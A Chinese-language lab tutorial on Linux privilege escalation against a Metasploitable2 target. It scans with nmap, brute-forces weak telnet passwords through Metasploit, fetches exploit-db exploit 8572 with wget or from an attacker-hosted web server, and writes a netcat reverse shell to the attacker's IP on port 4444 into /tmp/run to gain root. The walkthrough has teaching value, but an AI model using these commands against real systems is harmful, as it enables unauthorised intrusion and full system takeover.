利用telnet漏洞教你一步登天掌握linux提权
很多伙伴在利用完漏洞打了几发弹药之后,尝到了攻克计算机漏洞后带来的巨大喜悦。但是在这群对计算机安全热爱的热血青年中,不乏有一些人想要对已经被攻克的计算机系统,进行一些更深刻地操作,比如系统提权。他们常常苦于自己没有一个清晰的思路,觉得自己技术还达不到,或者手段杂乱无章,因而错过了一些上手的机会。本篇文章就基于telenet提权,给一些伙伴对系统提权操作带来一个清晰的认识。
名词介绍:
系统提权:顾名思义,就是对于系统做出一个系统权限的提升。比如被攻克的计算机只给了你一个web权限,进行权限的提升给它提升到管理员权限甚至系统权限,便可以进行更多的操作,掌握更多的被攻克的计算机的资源。由于本篇文章是基于熟悉的telnet 提权的,靶机是Metasploitable2 -Linux,因此也比较容易进行复现。
Telenet:即使现在并不像ssh等功能类似的服务流行,但是对于网络爱好者,telnet并不陌生。Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。用户在本地计算机上即可完成在远程主机操作。
攻击机:192.168.79.192
靶机:192.168.79.137
接下来是详细的步骤。
对于目标扫描在一开始你是不知道目标机暴露了什么缺点的,所以你首先要做一个大致的扫描。
利用nmap 尝试扫描
对于目标机我们可以看到它是开了23端口的telnet 服务的,当然收集信息要收集到有把握打一波的程度,那么就需要详细的扫描一下。
扫描出来版本之后第一想到的就是弱口令爆破一下,当然你把版本放进浏览器搜一下也会有相应的漏洞提示你。那我们就开始爆破
你可以利用一些弱口令爆破工具,或者metasploit 本文用metasploit
使用模块设置扫描登录的方法:
查看需要设置的参数:
我们要设置目标主机的ip 然后再设置一个弱口令的用户字典和一个密码字典
如果登录成功就会显示一个+号,这时你的本地也会有一个session
使用这个session 来操作目标主机
操作进行到这一步我们已经成功拿下了目标主机。
想必大家都懂,但是我想说的是,到了提权很多人就不知道怎么打了,找exp 然后本地操作还是目标机操作? 很容易晕,搞得自己晕头转向,一知半解。当初我也是这样的,所以本篇文章来帮助一些朋友缕清思路。
提权当然是你把能提升权限的脚本甚至工具,发送到目标机,在目标机上提升目标机的权限,提升权限之后你又能利用这个更高的权限,那么就是要把提升后的权限操作反弹到你的攻击机。如何打?当然把弹药放进目标机器上打。
如何把exp 放进目标机子
上一步我们已经登录了目标机,如果目标机是连上外网的,那么我们直接就可以将exp 下载到目标机即 利用linux 下载命令
wget http://www.exploit-db.com/download/8572或者从其他的网站下载
把提权脚本下载下来。那么目标机就会有下载下来的脚本,但是常常是有些主机是不允许连接外网的,所以会下载失败
这个时候我们就没有办法了吗? 当然不是,既然不能从外网下载提权脚本,我们可以让目标机从我们自己的攻击机上来下载脚本。
因为下载的是一个c 文件,所以我们需要把8572 命名为一个c文件。
既然要目标机从我们的攻击机上下载这个telnet.py 那么就需要我们的攻击机 开启www服务,然后把test.c放在www目录下。
编辑test.c在代码的最后给与一个换行不然脚本执行会出错
然后开启www服务,这样靶机就可以从我们攻击机这里下载这个test.c
我们控制这个目标机下载这个telet.py
可以看到已经把弹药下载到目标机上了,接下来就是利用弹药提权。
利用弹药提权就需要在我们的攻击机那里设置一个监听端口,不然提权脚本提权之后不知道反弹到哪里,当然有的是直接执行提权脚本就可以在普通命令窗口拿到权限。
设置监听端口
设置好之后,执行提权脚本
输入echo '#!/bin/sh' > /tmp/run //脚本设计的提权操作
输入echo '/bin/netcat -e /bin/sh 192.168.79.192 4444' >> /tmp/run //反弹shell
输入ps -edf |grep udev
此时已经出现了root 用户的pid 2796
执行./exp 2795 // 2795 为root pid-1 这是提权脚本设计的
就可以在监听的4444端口看到命令行界面
查看用户权限
此时已经变成了root 权限也就是提权成功。
总结:这些提权操作虽然是老生常谈的东西,但是它带给我们的思路一定是非常深刻的。谨以此文来巩固自己的知识,同时也希望给与一些伙伴带来一种对提权操作的认识,如果这些你都认识,那么我相信从内网反弹shell 到公网等操作你也会认识。
